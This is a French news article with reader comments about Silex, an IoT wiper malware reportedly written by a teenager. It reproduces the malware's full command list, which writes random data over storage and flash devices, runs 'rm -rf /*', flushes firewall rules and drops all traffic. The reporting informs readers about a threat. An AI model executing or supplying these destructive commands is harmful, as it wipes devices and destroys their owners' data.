Un adolescent de 14 ans développe le malware Silex, qui efface le firmware des appareils IdO mal protégés
Et rend l'appareil inutilisable

95PARTAGES

16  0 
Un développeur adolescent et son équipe ont mis au point un nouveau programme malveillant, Silex, qui a délibérément bloqué des appareils IdO mal protégés par milliers, sur une courte période. Les attaques se sont arrêtées lorsque le serveur de commande et de contrôle est tombé en panne vers 16 heures EST. Même sans le serveur de commande et de contrôle pour envoyer des instructions, le logiciel malveillant a continué d'exécuter ses routines sur les appareils infectés.

Larry Cashdollar de l'équipe Akamai Security Intelligence Response Team (SIRT) a été le premier à découvrir Silex. Le malware a frappé son honeypot en essayant des informations d'identification par défaut sur une connexion telnet.

Le chercheur affirme que Silex supprime le système infecté en écrivant des données aléatoires à partir de '/ dev / random' sur tous les lecteurs de stockage détectés.

« En examinant les échantillons binaires collectés dans mon pot-de-miel, je vois que Silexbot appelle fdisk -l qui va alors répertorier toutes les partitions du disque. À l'aide de cette liste, Silexbot écrit ensuite des données aléatoires de / dev / random sur l'une des partitions qu'il découvre », a-t-il expliqué dans un billet dans lequel il a livré son une analyse.

Silex exécute certaines commandes néfastes qui suppriment les configurations réseau, effacent les règles iptables et ajoutent une règle qui supprime toutes les connexions avant de redémarrer le périphérique.


Ces instructions rendent l'appareil affecté inutilisable. Pour retrouver l’usage de leurs appareils, les victimes doivent réinstaller manuellement le micrologiciel du périphérique, une tâche parfois trop compliquée pour la majorité des propriétaires de périphériques. Il n’est pas exclu que certains propriétaires jettent leurs appareils, pensant avoir eu une panne matérielle sans savoir qu'ils ont été touchés par des logiciels malveillants.

Cashdollar a examiné les fichiers binaires des systèmes ARM, mais une version du shell Bash était également disponible au téléchargement, de sorte que toute architecture de type UNIX aurait pu être une cible.

Une équipe de trois personnes dont un adolescent de 14 ans

Selon le chercheur en sécurité Ankit Anubhav de NewSky, Silex a été créée par une équipe de trois personnes, le principal responsable étant un adolescent d'un pays européen utilisant les pseudonymes 'Light The Leafon' et 'Light The Sylveon'. Les deux autres membres sont "Alx" et "Skiddy".

Light The Leafon est l'auteur d'un autre bot appelé HITO, basé sur un autre programme malveillant IdO appelé Mirai. Il a rapidement développé des compétences lui permettant d'écrire son propre botnet.

Quant au but de Silex, il est conçu uniquement pour bricoler des dispositifs IdO afin d’empêcher les script kiddies de les atteindre. Autrement dit, l'auteur de programmes malveillants s'oppose à ce que les développeurs moins expérimentés puissent compromettre des systèmes non protégés et les utiliser pour gagner de l'argent.

Lors de l’exécution, Silex affiche le message suivant de l’auteur, s’excusant de cette attaque et en expliquant la raison.


Anubhav a parlé à Light de HITO il y a deux mois et a publié l'interview sur son podcast. L'auteur a déclaré lors de l'entretien qu'il avait 14 ans. Light a déclaré que le projet avait démarré comme une blague mais qu'il était maintenant devenu un projet à temps plein et qu'il avait abandonné l'ancien botnet HITO pour Silex.

L'adolescent a déclaré qu'il envisageait de développer davantage le logiciel malveillant et d'ajouter des fonctions encore plus destructrices. « La fonctionnalité originale de BrickerBot sera retravaillée », a déclaré Light à Anubhav.

Les plans incluent l’ajout de la possibilité de se connecter à des périphériques via SSH, en plus de la capacité de détournement de Telnet actuelle. De plus, Light prévoit également d'incorporer des exploits dans Silex, donnant ainsi au logiciel malveillant la possibilité d'utiliser des vulnérabilités pour pénétrer dans des appareils, de la même manière que la plupart des réseaux de botnets IoT actuels.

« Mon ami Skiddy et moi allons retravailler tout le bot », a assuré Light. « Il va cibler chaque exploit connu du public que charge Mirai ou Qbot ».

En somme, le plan initial de Silex consistait à développer un réseau de robots en intégrant de nouvelles méthodes de compromissions, telles que des exploits pour les vulnérabilités connues.

Voici les commandes Silex

Code : Sélectionner tout
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
"busybox cat /dev/urandom >/dev/mtdblock0"
"busybox cat /dev/urandom >/dev/sda"
"busybox cat /dev/urandom >/dev/ram0"
"busybox cat /dev/urandom >/dev/mmc0"
"busybox cat /dev/urandom >/dev/mtdblock10"
"fdisk -C 1 -H 1 -S 1 /dev/mtd0"
"fdisk -C 1 -H 1 -S 1 /dev/mtd1"
"fdisk -C 1 -H 1 -S 1 /dev/sda"
"fdisk -C 1 -H 1 -S 1 /dev/mtdblock0"
cat /proc/mounts
cat /dev/urandom | mtd_write mtd0 - 0 32768
cat /dev/urandom | mtd_write mtd1 - 0 32768
busybox cat /dev/urandom >/dev/mtd0 &
busybox cat /dev/urandom >/dev/sda &
busybox cat /dev/urandom >/dev/mtd1 &
busybox cat /dev/urandom >/dev/mtdblock0 &
busybox cat /dev/urandom >/dev/mtdblock1 &
busybox cat /dev/urandom >/dev/mtdblock2 &
busybox cat /dev/urandom >/dev/mtdblock3 &
busybox route del default
cat /dev/urandom >/dev/mtdblock0 &
cat /dev/urandom >/dev/mtdblock1 &
cat /dev/urandom >/dev/mtdblock2 &
cat /dev/urandom >/dev/mtdblock3 &
cat /dev/urandom >/dev/mtdblock4 &
cat /dev/urandom >/dev/mtdblock5 &
cat /dev/urandom >/dev/mmcblk0 &
cat /dev/urandom >/dev/mmcblk0p9 &
cat /dev/urandom >/dev/mmcblk0p12 &
cat /dev/urandom >/dev/mmcblk0p13 &
cat /dev/urandom >/dev/root &
cat /dev/urandom >/dev/mmcblk0p8 &
cat /dev/urandom >/dev/mmcblk0p16 &
route del default
iproute del default
ip route del default
rm -rf /* 2>/dev/null & iptables -F
iptables -t nat -F
iptables -A INPUT -j DROP
iptables -A FORWARD -j DROP
halt -n -f
reboot
Sources : Akamai, podcast Anubhav, twitter

Voir aussi :

Les attaques de ransomware contre les entreprises ont augmenté de plus de 500% au premier trimestre, d'après un rapport de Malwarebytes
Une vulnérabilité WinRAR vieille de 19 ans mène à plus de 100 exploits de malwares, mais elle a été corrigée dans la dernière version
265 chercheurs dans le monde ont mis en commun leurs découvertes, contribuant à éliminer plus de 100 000 sites Web de distribution de malwares
Les crypto-mineurs ont encore dominé le classement des malwares ayant eu le plus d'impact, dans l'édition de janvier du Global Threat Index

Une erreur dans cette actualité ? Signalez-le nous !

Avatar de walfrat
Membre habitué https://www.developpez.com
Le 27/06/2019 à 16:21
Certain disent que la meilleur défense c'est l'attaque après tout ...
0  1 
Avatar de defZero
Membre du Club https://www.developpez.com
Le 27/06/2019 à 19:17
set LOLMODE on
Unikernel dans ta fasse IoT Maker
unset LOLMODE

Plus sérieusement, si les fabricants voulez bien ce sortir les doigts.
Ils pourraient ne plus mettre tout un OS généraliste dans de l'IoT avec cette surface d'attaque de malade, mais un unikernel spécialisé tout simplement.
0  0 
Avatar de 6carbon
Membre averti https://www.developpez.com
Le 28/06/2019 à 10:55
Pour un gamin de 14 ans c'est balèze. Mais dans l'absolu profiter d'une connexion telnet mal sécurisée c'est à peine au-dessus d'un script kiddy.
Et puis s'il voulait vraiment empêcher d'autres script kiddies de profiter de cette faille, il pouvait tout simplement empêcher le démarrage du service telnet.
0  0 
Avatar de phil995511
Membre à l'essai https://www.developpez.com
Le 28/06/2019 à 12:19
Une phrase qui résume bien ce que je pense à ce sujet dit "les jeunes cons d'aujourd'hui seront les vieux cons de demain"... Il en a une sacré couche ce jeune homme (tout comme ces petits copains), ça commence mal pour lui !!!

Ça me rappel un article sur un gentil hacker qui infiltrait des routeurs mal protégés avec un soft pour les sécuriser et leur éviter ainsi que des programmes mal veillant puissent en prendre le contrôle à des fins criminelles.

Il y a "une ligue de gentils développeurs extraordinaires" et une d'idiots qui ne pense pas aux conséquences de leurs actes...
1  0 
Avatar de abriotde
Membre expérimenté https://www.developpez.com
Le 28/06/2019 à 18:59
Il y a "une ligue de gentils développeurs extraordinaires" et une d'idiots qui ne pense pas aux conséquences de leurs actes
Oh le monde n'est pas si binaire. Il a voulu s'amuser sans réfléchir aux conséquences, a son âge ça peut se comprendre, mais a d'autres moment il est peut-être hyper-sympa y compris en informatique.
Le problème viens du fait de laisser les mots de passe par défaut, qui viens lui même du fait que les gens veulent de l'informatique simple...
Après c'est certains que son programme est vraiment bien méchant. La seul gentillesse qu'il laisse c'est qu'il n'utilise pas la machine infecté pour aller plus loin... Il aurait été autrement plus difficile à arrêter.
0  0 
Avatar de TheLastShot
Membre extrêmement actif https://www.developpez.com
Le 29/06/2019 à 2:12
Quant au but de Silex, il est conçu uniquement pour bricoler des dispositifs IdO afin d’empêcher les script kiddies de les atteindre. Autrement dit, l'auteur de programmes malveillants s'oppose à ce que les développeurs moins expérimentés puissent compromettre des systèmes non protégés et les utiliser pour gagner de l'argent.
Donc pour empêcher d'autres dev de faire n'importe ils décident de rendre les appareil totalement inutilisable.... ça se tient... Bon moi je vais faire un petit génocide dans les pays pauvres, mais vous inquiétez pas c'est juste pour éviter à ces pauvres gens de tomber malade.
2  0 
Contacter le responsable de la rubrique Sécurité

Partenaire : Hébergement Web